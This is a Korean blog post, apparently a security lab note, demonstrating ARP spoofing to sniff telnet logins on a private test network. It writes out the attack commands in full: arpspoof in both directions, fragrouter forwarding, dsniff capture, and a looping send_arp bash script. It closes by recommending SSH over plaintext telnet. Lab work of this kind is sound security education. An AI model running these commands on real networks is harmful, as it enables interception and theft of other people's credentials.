-
스니핑_03_ARP스푸핑을 이용한 telnet 훔처보기정보보안/Network 2020. 7. 9. 13:59
실습 목표
- arp 스푸핑을 통해 telnet 접속을 스니핑하고 평문전송의 위험에 대해 실습한다.
정의
arp 스푸핑이란?
- 동적 arp테이블을 사용하는 타겟의 ip주소에 해당하는 mac주소를 변환시켜 frame을 도청할 수 있는 시스템을 말한다.
사용되는 툴
-
attacker
-
fragroute 툴
-
#fragroute -B1
-
패킷포워딩을 수행한다.
-
-
arpspoof 툴
-
arpspoof -i eth0 -t [target IP] [host IP (이 ip의 맥주소를 자신의 MAC주소로 변경시킨다.)]
-
target ip의 arp table에서 [host IP]의 맥주소를 명령어를 수행하는 환경의 맥주소로 변경시킨다.
-
백그라운드 동작을 수행하면 안되고 창을 계속 열어두어야한다.
-
-
dsniff 툴
-
네트워크로 들어온 패킷을 분석하여 보여주는 역할을 수행한다.
-
-
- client
- telnet 툴
- 23번 포트를 이용한 telnet 프로토콜을 이용하여 telnet server에 접속한다.
- telnet 툴
- server
- telnet-server 툴
- #systemctl start telnet .socket
- 위 명령어를 입력하여 telnet-server를 실행 시킨다
- telnet-server 툴
스니핑 환경 구성 목표
# arpspoof -i eth0 -t 192.168.10.112 192.168.10.149
# arpspoof -i eth0 -t 192.168.10.149 192.168.10.112
#fragrouter -B1
#dsniff
를 공격자 pc에서 입력한다.
server와 클라이언트에서 arp table을 확인하면 변경됨을 확인할 수 있다.
또한 telnet을 통해 데이터를 전송 후 종료하면
dsniff에 아래와 같이 데이터를 스니핑할 수 있다.
이때 ID와 PW가 평문으로 노출되는 문제를 볼 수있는데 이는 telnet이 데이터를 전송할때 평문전송으로하는 태생적 위협이 있다는 것을 알 수 있다. 따라서 ssh를 이용해 키를 이용한 함호화 통신을 이용하여 안전한 데이터 교환을 추천한다.
추가적으로 fake를 이용한 arp spoofing 도 가능하다.
attacker pc에 # yum install -y fake 명령어를 입력하여 fake를 설치한다.
#send_arp 명령어를 이용하여 arp packet을 사용할 수 있다 .
send_arp 의 명령어의 사용법은 다음과 같다.
#send_arp [host ip] [공격자 mac] [피해자 ip] [피해자 mac]
위에서 사용한 #arpspoof 과의 차이는 공격자의 mac을 입력할 수 있는 것이다.
하지만 반복적인 작업이 불가하기 때문에 아래와 같이 스크립트 파일을 생성하여 실행시켜 반복작업을 수행한다.
#!/bin/bash while [ : ] do send_arp 192.168.10.149 00:0C:29:90:15:27 192.168.10.112 00:0c:29:ad:73:0c send_arp 192.168.10.112 00:0C:29:90:15:27 192.168.10.149 ac:7b:a1:b2:3b:d0 done
양쪽의 arp 테이블을 확인하면 00:0c:29:90:15:27로 변경됨을 확인할 수 있다.
telnet client arp table telnet server arp table '정보보안 > Network' 카테고리의 다른 글
스니핑_02_ICMP redirect (0) 2020.07.08 스니핑_01_ARP스푸핑 (0) 2020.07.07